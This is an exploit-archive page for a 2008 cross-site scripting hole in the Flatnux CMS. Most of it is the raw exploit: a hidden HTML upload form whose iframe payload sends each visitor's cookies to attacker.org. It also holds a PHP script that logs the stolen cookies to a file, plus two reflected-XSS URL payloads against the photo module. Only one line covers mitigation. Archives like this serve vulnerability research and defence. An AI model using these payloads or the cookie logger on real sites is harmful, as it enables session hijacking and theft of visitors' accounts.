Flatnux Grabber Cookies Visitor

vendor:

Flatnux

by:

gmda

7.5

CVSS

HIGH

Cross-Site Scripting (XSS)

CWE

Product Name: Flatnux

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Flatnux Grabber Cookies Visitor

Flatnux is vulnerable to Cross-Site Scripting (XSS) attacks. An attacker can inject malicious code into the application by registering and logging in, and using the HTML code provided in the exploit. This code will execute a JavaScript that will grab the cookies of the visitor and send them to the attacker's website.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the application.

Source

Exploit-DB raw data:

<!--
exploit flatnux grabber cookies visitor
site :http://www.speleoalex.altervista.org/flatnuke3/index.php
download:http://www.speleoalex.altervista.org/flatnuke3/index.php?mod=06_Download
author:gmda

Flatnux does not filter code html/javascript then you can injector in this way:

operation
1] register
2] make longin
3] use the HTML code below
-->
<html><head>
</head>
<body>
<form enctype="multipart/form-data" action="http://victim.org/flatnux/index.php?mod=08_Files&amp;opmod=insertrecord" method="POST">
titolo*<input  size ="20"  style="visibility:hidden;" value="filex &lt;iframe  width=&quot;0&quot; height=&quot;0&quot; style=&quot;visibility:hidden;&quot; src=&quot;javascript:window.location=&apos;http://attacker.org/grab.php?cmd=&apos;+document.cookie;&quot;&gt;&lt;/iframe&gt;" name="name" type="text" /><br />
<textarea title="Inserisci qui la descrizione" cols="80"  rows="10"  name="description" style="visibility:hidden;" >&lt;/textarea&gt;<br />
Immagine<input  size="20" name="foto1" type="file" style="visibility:hidden;" /><br />
File<input  size="20" name="file" type="file" style="visibility:hidden;" /><br />
<input type="submit" value="Zic">
</form>
</body></html>
<!-- grab.php
<?php $data = $_GET['cmd'];
$date=date("j F, Y, g:i a");
$referer=$_SERVER['HTTP_REFERER'];
$fh = fopen("cookie.txt",'a+');
fwrite($fh, $referer . " / " . $data."\n".$date."\n");
fclose($fh);
?>
-->

<!-- xss variables mod foto

/sections/05_Foto/photo.php?mod=05_Foto&foto=>"><script>alert(69)%3B</script>&lang=it
/?mod=%3E%22%3E%3Cscript%3Ealert(69)%3B%3C/script%3E

-->

# milw0rm.com [2008-12-14]